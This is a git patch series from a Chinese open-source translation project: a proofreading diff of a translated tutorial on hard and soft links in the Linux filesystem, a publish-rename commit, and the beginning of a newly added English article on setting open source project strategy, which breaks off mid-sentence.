2001 From: wxy Date: Sun, 3 Dec 2017 19:32:19 +0800 Subject: [PATCH 0164/1627] PRF:20170622 A users guide to links in the Linux filesystem.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yongshouzhang 恭喜你,完成了第一篇翻译,很用心。我的校对,可以参照 diff。 --- ... guide to links in the Linux filesystem.md | 129 ++++++++---------- 1 file changed, 59 insertions(+), 70 deletions(-) diff --git a/translated/tech/20170622 A users guide to links in the Linux filesystem.md b/translated/tech/20170622 A users guide to links in the Linux filesystem.md index 84c5756c59..7d731693d8 100644 --- a/translated/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/translated/tech/20170622 A users guide to links in the Linux filesystem.md @@ -1,32 +1,19 @@ - -linux 文件链接用户指南 +用户指南:Linux 文件系统的链接 ============================================================ -### 学习如何使用链接,通过提供对 linux 文件系统多个位置的文件访问,来让日常工作变得轻松 +> 学习如何使用链接,通过从 Linux 文件系统多个位置来访问文件,可以让日常工作变得轻松。 +![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/links.png?itok=enaPOi4L "A user's guide to links in the Linux filesystem") -![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] -在我为 opensource.com 写过的关于linux文件系统方方面面的文章中,包括 [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13],我曾简要的提到过linux文件系统一个有趣的特性,它允许用户访问linux文件目录树中多个位置的文件来简化一些任务 +在我为 opensource.com 写过的关于 Linux 文件系统方方面面的文章中,包括 [Linux 的 EXT4 文件系统的历史、特性以及最佳实践][10]; [在 Linux 中管理设备][11];[Linux 文件系统概览][12] 和 [用户指南:逻辑卷管理][13],我曾简要的提到过 Linux 文件系统一个有趣的特性,它允许用户从多个位置来访问 Linux 文件目录树中的文件来简化一些任务。 -linux 文件系统中有两种链接:硬链接和软链接。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件进行多个目录项的访问(引用),但实现却大为不同。链接的强大功能赋予了 linux 文件系统灵活性,因为[一切即文件][14]。 +Linux 文件系统中有两种链接link硬链接hard link软链接soft link。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件的多个目录项(引用)的访问,但实现却大为不同。链接的强大功能赋予了 Linux 文件系统灵活性,因为[一切皆是文件][14]。 -更多 linux 资源 +举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示旧版本库缺失。通常,库名的唯一变化就是版本号。出于直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 -*   [什么是 linux ?][1] - -*   [什么是 linux 容器?][2] - -*   [现在下载: linux 命令速查表][3] - -*   [linux 高级命令速查表][4] - -*   [我们最新的 linux 文章][5] - -举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示就版本库缺失。 同城库中唯一变化是版本号。出于该直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。 程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 - -事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了住版本号,链接所指文件的文件名中同样包含了最小版本号。再比如,程序的一些必需文件为了迎合 linux 文件系统的规范从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 /lib64 目录做一个长清单列表,你会发现很多这样的例子。 +事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了主版本号,链接所指向的文件的文件名中同样包含了小版本号。再比如,程序的一些必需文件为了迎合 Linux 文件系统规范,从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 `/lib64` 目录做一个长清单列表,你会发现很多这样的例子。 ``` lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm @@ -44,36 +31,37 @@ lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libak lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 ``` -**/lib64** 目录下的一些链接 +`/lib64` 目录下的一些链接 -T在上面展示的 **/lib64** 目录清单列表中,文件模式第一个字母 I 表示这是一个符号链接或软链接。 +在上面展示的 `/lib64` 目录清单列表中,文件模式第一个字母 `l` (小写字母 l)表示这是一个软链接(又称符号链接)。 ### 硬链接 -在 [An introduction to Linux's EXT4 filesystem][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的节点,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向文件节点的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的文件节点,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 +在 [Linux 的 EXT4 文件系统的历史、特性以及最佳实践][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的 inode,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向 inode 的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的 inode ,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 -如下图1所示,多个目录项指向了同一文件节点。这些目录项都是硬链接。我曾使用波浪线 (**~**) 表示三级目录项的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 **/home/user** 。值得注意的是,四级目录项是一个完全不同的目录,**/home/shared** 可能是该计算机上用户的共享文件目录。 +如下图 1 所示,多个目录项指向了同一 inode 。这些目录项都是硬链接。我曾在三个目录项中使用波浪线 (`~`) 的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 `/home/user` 。值得注意的是,第四个目录项是一个完全不同的目录,`/home/shared`,可能是该计算机上用户的共享文件目录。 ![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) -Figure 1 -单一文件系统中的文件硬链接数是有限制的。”文件系统“ 是就挂载在特定挂载点上的分区或逻辑卷而言的,此例中是 /home。这是因为文件系统中的节点号都是唯一的。在不同的文件系统中,如 **/var** 或 **/opt**,会有和 **/home** 中相同的节点号。 +*图 1* -因为所有的硬链接都指向了包含文件元信息的节点,这些特性都是文件的一部分,像所属关系,权限,节点硬链接数目,这些特性不能区分不同的硬链接。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在节点信息中的文件名。对单靠 **file/inode** 来定位文件的同一目录中的硬链接必须拥有不同的文件名,基于上述事实,同一目录下不能存在重复的文件名。 +硬链接被限制在一个单一的文件系统中。此处的“文件系统” 是指挂载在特定挂载点上的分区或逻辑卷,此例中是 `/home`。这是因为在每个文件系统中的 inode 号都是唯一的。而在不同的文件系统中,如 `/var` 或 `/opt`,会有和 `/home` 中相同的 inode 号。 -文件的硬链接数目可通过 **ls -l** 来查看,如果你想查看实际节点号,可使用 **ls -li** 命令。 +因为所有的硬链接都指向了包含文件元信息的单一 inode ,这些属性都是文件的一部分,像所属关系、权限、到该 inode 的硬链接数目,对每个硬链接来说这些特性没有什么不同的。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在 inode 信息中的文件名。链接到同一目录中的单一文件/ inode 的硬链接必须拥有不同的文件名,这是基于同一目录下不能存在重复的文件名的事实的。 + +文件的硬链接数目可通过 `ls -l` 来查看,如果你想查看实际节点号,可使用 `ls -li` 命令。 ### 符号(软)链接 -软链接(符号链接)和硬链接的区别在于,硬链接直接指向文件中的节点而软链接直接指向一个目录项,即一个硬链接。因为软链接指向一个文件的硬链接而非该文件的节点信息,所以它们并不依赖于文件节点,这使得它们能在不同的文件系统中起作用,跨越不同的分区和逻辑卷。 +硬链接和软链接(也称为符号链接symlink)的区别在于,硬链接直接指向属于该文件的 inode ,而软链接直接指向一个目录项,即指向一个硬链接。因为软链接指向的是一个文件的硬链接而非该文件的 inode ,所以它们并不依赖于 inode 号,这使得它们能跨越不同的文件系统、分区和逻辑卷起作用。 -软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,**ls** 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 +软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,`ls` 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 ### 实验项目: 链接实验 -我认为最容易理解链接用法及其差异的方法即使动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 **~/tmp** 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 +我认为最容易理解链接用法及其差异的方法是动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 `~/temp` 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 -### **初始工作** +#### 初始工作 首先,在你要进行实验的目录下为该项目中的任务创建一个临时目录,确保当前工作目录(PWD)是你的主目录,然后键入下列命令。 @@ -81,19 +69,19 @@ Figure 1 mkdir temp ``` -使用这个命名将当前工作目录切换到 *~/temp**  +使用这个命令将当前工作目录切换到 `~/temp`。 ``` cd temp ``` -实验开始,我们创建一个能够链接的文件,下列命令可完成该工作并向其填充内容。 +实验开始,我们需要创建一个能够链接到的文件,下列命令可完成该工作并向其填充内容。 ``` du -h > main.file.txt ``` -使用 *ls -l** 长列表命名确认文件被正确地创建。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 +使用 `ls -l` 长列表命名确认文件正确地创建了。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 ``` [dboth@david temp]$ ls -l @@ -101,11 +89,11 @@ total 4 -rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt ``` -在列表中,文件模式串后的数字 1 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 +在列表中,文件模式串后的数字 `1` 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 -### **对硬链接进行实验** +#### 对硬链接进行实验 -硬链接创建一个指向同一文件节点的目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 **~/temp**。创建一个指向 **main.file.txt** 的硬链接,然后查看该目录下文件列表。 +硬链接创建一个指向同一 inode 的新目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 `~/temp`。创建一个指向 `main.file.txt` 的硬链接,然后查看该目录下文件列表。 ``` [dboth@david temp]$ ln main.file.txt link1.file.txt @@ -115,7 +103,7 @@ total 8 -rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt ``` -目录中两个文件都有两个链接且大小相同,时间戳也一样。这是同一文件节点的两个不同的硬链接,即该文件的目录项。再建立一个该文件的硬链接,并列出目录清单内容,你可以建立 **link1.file.txt** 或 **main.file.txt** 的硬链接。 +目录中两个文件都有两个链接且大小相同,时间戳也一样。这就是有一个 inode 和两个硬链接(即该文件的目录项)的一个文件。再建立一个该文件的硬链接,并列出目录清单内容。你可以建立硬链接: `link1.file.txt` 或 `main.file.txt`。 ``` [dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l @@ -132,14 +120,15 @@ total 16 ln: failed to create hard link 'link2.file.txt': File exists ``` -显然不行,因为 **link2.file.txt** 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录,你的主目录中创建一个链接。 +显然不行,因为 `link2.file.txt` 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录(你的主目录)中创建一个链接。 ``` [dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt ``` - 上面的 **ls** 命令显示 **main.file.txt** 文件确实存在于主目录中,且与该文件在 temp 目录中的名称一致。当然它们是没有区别的两个文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 temp 目录中添加一个非链接文件。 +上面的 `ls` 命令显示 `main.file.txt` 文件确实存在于主目录中,且与该文件在 `temp` 目录中的名称一致。当然它们不是不同的文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 `temp` 目录中添加一个非链接文件。 + ``` [dboth@david temp]$ touch unlinked.file ; ls -l total 12 @@ -149,7 +138,7 @@ total 12 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -使用 **ls** 命令的 **i** 选项查看文件节点的硬链接号和新创建文件的硬链接号。 +使用 `ls` 命令的 `i` 选项查看 inode 的硬链接号和新创建文件的硬链接号。 ``` [dboth@david temp]$ ls -li @@ -160,7 +149,7 @@ total 12 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -注意上面文件模式左边的数字 **657024** ,这是三个硬链接文件所指的同一文件的节点号,你也可以使用 **i** 选项查看主目录中所创建的链接节点号,和该值相同。只有一个链接的文件节点号和其他的不同,在你的系统上看到的不同于本文中的。 +注意上面文件模式左边的数字 `657024` ,这是三个硬链接文件所指的同一文件的 inode 号,你也可以使用 `i` 选项查看主目录中所创建的链接的节点号,和该值相同。而那个只有一个链接的 inode 号和其他的不同,在你的系统上看到的 inode 号或许不同于本文中的。 接着改变其中一个硬链接文件的大小。 @@ -173,11 +162,11 @@ total 12 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -现在的硬链接文件大小比原来大,因为多个目录项链接着同一文件。 +现在所有的硬链接文件大小都比原来大了,因为多个目录项都链接着同一文件。 -我知道下个实验在我的电脑上会成功,因为我的 **/tmp** 目录是一个独立的逻辑卷,如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U盘,如果上述选项适合你,你可以进行这个实验。 +下个实验在我的电脑上会出现这样的结果,是因为我的 `/tmp` 目录在一个独立的逻辑卷上。如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U 盘,如果上述方式适合你,你可以进行这个实验。 -试着在 **/tmp** 目录中建立一个 **~/temp** 目录下文件的链接(或你的文件系统所在的位置) +试着在 `/tmp` 目录中建立一个 `~/temp` 目录下文件的链接(或你的文件系统所在的位置)。 ``` [dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt @@ -185,9 +174,9 @@ ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': Invalid cross-device link ``` -为什么会出现这个错误呢? 原因是每一个单独的挂载文件系统都有一套自己的节点号。简单的通过文件节点号来跨越整个文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 +为什么会出现这个错误呢? 原因是每一个单独的可挂载文件系统都有一套自己的 inode 号。简单的通过 inode 号来跨越整个 Linux 文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 -有时你可能会想找到一个文件节点的所有硬链接。你可以使用 **ls -li** 命令。然后使用 **find** 命令找到所有硬链接的节点号。 +有时你可能会想找到一个 inode 的所有硬链接。你可以使用 `ls -li` 命令。然后使用 `find` 命令找到所有硬链接的节点号。 ``` [dboth@david temp]$ find . -inum 657024 @@ -196,7 +185,7 @@ Invalid cross-device link ./link2.file.txt ``` -注意 **find** 命令不能找到所属该节点的四个硬链接,因为我们在 **~/temp** 目录中查找。 **find** 命令仅在当前工作目录及其子目录中中查找文件。要找到所有的硬链接,我们可以使用下列命令,注定你的主目录作为起始查找条件。 +注意 `find` 命令不能找到所属该节点的四个硬链接,因为我们在 `~/temp` 目录中查找。 `find` 命令仅在当前工作目录及其子目录中查找文件。要找到所有的硬链接,我们可以使用下列命令,指定你的主目录作为起始查找条件。 ``` [dboth@david temp]$ find ~ -samefile main.file.txt @@ -206,13 +195,13 @@ Invalid cross-device link /home/dboth/main.file.txt ``` -如果你是非超级用户没有权限,可能会看到错误信息。这个命令也使用了 **-samefile** 选项而不是指定文件的节点号。这个效果和使用文件节点号一样且更容易,如果你知道其中一个硬链接名称的话。 +如果你是非超级用户,没有权限,可能会看到错误信息。这个命令也使用了 `-samefile` 选项而不是指定文件的节点号。这个效果和使用 inode 号一样且更容易,如果你知道其中一个硬链接名称的话。 -### **对软链接进行实验** +#### 对软链接进行实验 -如你刚才看到的,不能越过文件系统交叉创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然他们可以达到相同的目的,但他们是非常不同的,知道这些差异是很重要的。 +如你刚才看到的,不能跨越文件系统边界创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然它们可以达到相同的目的,但它们是非常不同的,知道这些差异是很重要的。 -让我们在 **~/temp** 目录中创建一个符号链接来开始我们的探索。 +让我们在 `~/temp` 目录中创建一个符号链接来开始我们的探索。 ``` [dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li @@ -225,9 +214,9 @@ link2.file.txt 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -拥有节点号 **657024** 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的文件节点号 **658270**。 名为**link3.file.txt** 的软链接指向了 **link2.file.txt** 文件。使用 **cat** 命令查看 **link3.file.txt** 文件的内容。符号链接的文件节点信息以字母 "**l**" 开头,意味着这个文件实际是个符号链接。 +拥有节点号 `657024` 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的 inode 号 `658270`。 名为 `link3.file.txt` 的软链接指向了 `link2.file.txt` 文件。使用 `cat` 命令查看 `link3.file.txt` 文件的内容。符号链接的 inode 信息以字母 `l` (小写字母 l)开头,意味着这个文件实际是个符号链接。 -上例中软链接文件 **link3.file.txt** 的大小只有 14 字节。这是文本内容 **link3.file.txt -> link2.file.txt** 的大小,实际上是目录项的内容。目录项 **link3.file.txt** 并不指向一个文件节点;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 **/tmp** 目录中尝试过的。 +上例中软链接文件 `link3.file.txt` 的大小只有 14 字节。这是文本内容 `link3.file.txt` 的大小,即该目录项的实际内容。目录项 `link3.file.txt` 并不指向一个 inode ;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 `/tmp` 目录中尝试过的。 ``` [dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt @@ -236,11 +225,11 @@ lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> /home/dboth/temp/link2.file.txt ``` -### **删除链接** +#### 删除链接 当你删除硬链接或硬链接所指的文件时,需要考虑一些问题。 -首先,让我们删除硬链接文件 **main.file.txt**。注意每个硬链接都指向了一个文件节点。 +首先,让我们删除硬链接文件 `main.file.txt`。注意指向 inode 的每个目录项就是一个硬链接。 ``` [dboth@david temp]$ rm main.file.txt ; ls -li @@ -252,9 +241,9 @@ link2.file.txt 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -**main.file.txt** 是第一个硬链接文件,当该文件被创建时。现在删除它仍然保留原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 +`main.file.txt` 是该文件被创建时所创建的第一个硬链接。现在删除它,仍然保留着原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 -现在山村 **link2.file.txt** 硬链接文件。 +现在删除 `link2.file.txt` 硬链接文件。 ``` [dboth@david temp]$ rm link2.file.txt ; ls -li @@ -266,27 +255,27 @@ link2.file.txt 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标硬链接闪烁。如果需要修改软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除。 您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 **rm** 命令删除它们。 +注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标的硬链接会闪烁显示。如果需要修复这个损坏的软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除就行。您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 `rm` 命令删除它们。 -**unlink** 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 **rm** 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 +`unlink` 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 `rm` 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 ### 写在最后 -我曾与这两种类型的链接很长一段时间后,我开始了解他们的能力和特质。为我所教的Linux课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 +我用过这两种类型的链接很长一段时间后,我开始了解它们的能力和特质。我为我所教的 Linux 课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 -------------------------------------------------------------------------------- 作者简介: -戴维.布斯 - 戴维.布斯是Linux和开源倡导者,居住在Raleigh的北卡罗莱纳。他在IT行业工作了四十年,为IBM工作了20年多的OS 2。在IBM时,他在1981编写了最初的IBM PC的第一个培训课程。他教了RHCE班红帽子和曾在MCI世通公司,思科,和北卡罗莱纳州。他已经用Linux和开源软件工作将近20年了。 +戴维.布斯 - 戴维.布斯是 Linux 和开源倡导者,居住在北卡罗莱纳的罗列 。他在 IT 行业工作了四十年,为 IBM 工作了 20 多年的 OS/2。在 IBM 时,他在 1981 年编写了最初的 IBM PC 的第一个培训课程。他为 RedHat 教授过 RHCE 班,并曾在 MCI Worldcom、思科和北卡罗莱纳州工作。他已经用 Linux 和开源软件工作将近 20 年了。 --------------------------------- via: https://opensource.com/article/17/6/linking-linux-filesystem -作者:[David Both ][a] +作者:[David Both][a] 译者:[yongshouzhang](https://github.com/yongshouzhang) -校对:[yongshouzhang](https://github.com/yongshouzhang) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -300,12 +289,12 @@ via: https://opensource.com/article/17/6/linking-linux-filesystem [7]:https://opensource.com/user/14106/feed [8]:https://www.flickr.com/photos/digypho/7905320090 [9]:https://creativecommons.org/licenses/by/2.0/ -[10]:https://opensource.com/article/17/5/introduction-ext4-filesystem -[11]:https://opensource.com/article/16/11/managing-devices-linux -[12]:https://opensource.com/life/16/10/introduction-linux-filesystems +[10]:https://linux.cn/article-8685-1.html +[11]:https://linux.cn/article-8099-1.html +[12]:https://linux.cn/article-8887-1.html [13]:https://opensource.com/business/16/9/linux-users-guide-lvm [14]:https://opensource.com/life/15/9/everything-is-a-file -[15]:https://opensource.com/article/17/5/introduction-ext4-filesystem -[16]:https://opensource.com/article/17/5/introduction-ext4-filesystem#fig2 +[15]:https://linux.cn/article-8685-1.html +[16]:https://linux.cn/article-8685-1.html#3_19182 [17]:https://opensource.com/users/dboth [18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments From 7d8f1fa3718792ea4433e24f302f6a552fa97f12 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 19:33:11 +0800 Subject: [PATCH 0165/1627] PUB:20170622 A users guide to links in the Linux filesystem.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yongshouzhang 文章发布地址:https://linux.cn/article-9105-1.html (公众号明天推送),你的 LCTT 专页地址: https://linux.cn/lctt/yongshouzhang --- .../20170622 A users guide to links in the Linux filesystem.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20170622 A users guide to links in the Linux filesystem.md (100%) diff --git a/translated/tech/20170622 A users guide to links in the Linux filesystem.md b/published/20170622 A users guide to links in the Linux filesystem.md similarity index 100% rename from translated/tech/20170622 A users guide to links in the Linux filesystem.md rename to published/20170622 A users guide to links in the Linux filesystem.md From b918001472fc4f209a74a28506e3e2930930796d Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:36:22 +0800 Subject: [PATCH 0166/1627] =?UTF-8?q?20171203-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... and How to Set an Open Source Strategy.md | 120 ++++++++++++++++++ 1 file changed, 120 insertions(+) create mode 100644 sources/tech/20171115 Why and How to Set an Open Source Strategy.md diff --git a/sources/tech/20171115 Why and How to Set an Open Source Strategy.md b/sources/tech/20171115 Why and How to Set an Open Source Strategy.md new file mode 100644 index 0000000000..79ec071b4d --- /dev/null +++ b/sources/tech/20171115 Why and How to Set an Open Source Strategy.md @@ -0,0 +1,120 @@ +Why and How to Set an Open Source Strategy +============================================================ + +![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/open-source-strategy-1024x576.jpg) + +This article explains how to walk through, measure, and define strategies collaboratively in an open source community. + + _“If you don’t know where you are going, you’ll end up someplace else.” _ _—_  Yogi Berra + +Open source projects are generally started as a way to scratch one’s itch — and frankly that’s one of its greatest attributes. Getting code down provides a tangible method to express an idea, showcase a need, and solve a problem. It avoids over thinking and getting a project stuck in analysis-paralysis, letting the project pragmatically solve the problem at hand. + +Next, a project starts to scale up and gets many varied users and contributions, with plenty of opinions along the way. That leads to the next big challenge — how does a project start to build a strategic vision? In this article, I’ll describe how to walk through, measure, and define strategies collaboratively, in a community. + +Strategy may seem like a buzzword of the corporate world rather something that an open source community would embrace, so I suggest stripping away the negative actions that are sometimes associated with this word (e.g., staff reductions, discontinuations, office closures). Strategy done right isn’t a tool to justify unfortunate actions but to help show focus and where each community member can contribute. + +A good application of strategy achieves the following: + +* Why the project exists? + +* What the project looks to achieve? + +* What is the ideal end state for a project is. + +The key to success is answering these questions as simply as possible, with consensus from your community. Let’s look at some ways to do this. + +### Setting a mission and vision + + _“_ _Efforts and courage are not enough without purpose and direction.”_  — John F. Kennedy + +All strategic planning starts off with setting a course for where the project wants to go. The two tools used here are  _Mission_  and  _Vision_ . They are complementary terms, describing both the reason a project exists (mission) and the ideal end state for a project (vision). + +A great way to start this exercise with the intent of driving consensus is by asking each key community member the following questions: + +* What drove you to join and/or contribute the project? + +* How do you define success for your participation? + +In a company, you’d ask your customers these questions usually. But in open source projects, the customers are the project participants — and their time investment is what makes the project a success. + +Driving consensus means capturing the answers to these questions and looking for themes across them. At R Consortium, for example, I created a shared doc for the board to review each member’s answers to the above questions, and followed up with a meeting to review for specific themes that came from those insights. + +Building a mission flows really well from this exercise. The key thing is to keep the wording of your mission short and concise. Open Mainframe Project has done this really well. Here’s their mission: + + _Build community and adoption of Open Source on the mainframe by:_ + +* _Eliminating barriers to Open Source adoption on the mainframe_ + +* _Demonstrating value of the mainframe on technical and business levels_ + +* _Strengthening collaboration points and resources for the community to thrive_ + +At 40 words, it passes the key eye tests of a good mission statement; it’s clear, concise, and demonstrates the useful value the project aims for. + +The next stage is to reflect on the mission statement and ask yourself this question: What is the ideal outcome if the project accomplishes its mission? That can be a tough one to tackle. Open Mainframe Project put together its vision really well: + + _Linux on the Mainframe as the standard for enterprise class systems and applications._ + +You could read that as a [BHAG][1], but it’s really more of a vision, because it describes a future state that is what would be created by the mission being fully accomplished. It also hits the key pieces to an effective vision — it’s only 13 words, inspirational, clear, memorable, and concise. + +Mission and vision add clarity on the who, what, why, and how for your project. But, how do you set a course for getting there? + +### Goals, Objectives, Actions, and Results + + _“I don’t focus on what I’m up against. I focus on my goals and I try to ignore the rest.”_  — Venus Williams + +Looking at a mission and vision can get overwhelming, so breaking them down into smaller chunks can help the project determine how to get started. This also helps prioritize actions, either by importance or by opportunity. Most importantly, this step gives you guidance on what things to focus on for a period of time, and which to put off. + +There are lots of methods of time bound planning, but the method I think works the best for projects is what I’ve dubbed the GOAR method. It’s an acronym that stands for: + +* Goals define what the project is striving for and likely would align and support the mission. Examples might be “Grow a diverse contributor base” or “Become the leading project for X.” Goals are aspirational and set direction. + +* Objectives show how you measure a goal’s completion, and should be clear and measurable. You might also have multiple objectives to measure the completion of a goal. For example, the goal “Grow a diverse contributor base” might have objectives such as “Have X total contributors monthly” and “Have contributors representing Y different organizations.” + +* Actions are what the project plans to do to complete an objective. This is where you get tactical on exactly what needs done. For example, the objective “Have contributors representing Y different organizations” would like have actions of reaching out to interested organizations using the project, having existing contributors mentor new mentors, and providing incentives for first time contributors. + +* Results come along the way, showing progress both positive and negative from the actions. + +You can put these into a table like this: + +| Goals | Objectives | Actions | Results | +|:--|:--|:--|:--| +| Grow a diverse contributor base     | Have X total contributors monthly | Existing contributors mentor new mentors Providing incentives for first time contributors | | +| | Have contributors representing Y different organizations | Reach out to interested organizations using the project | | + + +In large organizations, monthly or quarterly goals and objectives often make sense; however, on open source projects, these time frames are unrealistic. Six- even 12-month tracking allows the project leadership to focus on driving efforts at a high level by nurturing the community along. + +The end result is a rubric that provides clear vision on where the project is going. It also lets community members more easily find ways to contribute. For example, your project may include someone who knows a few 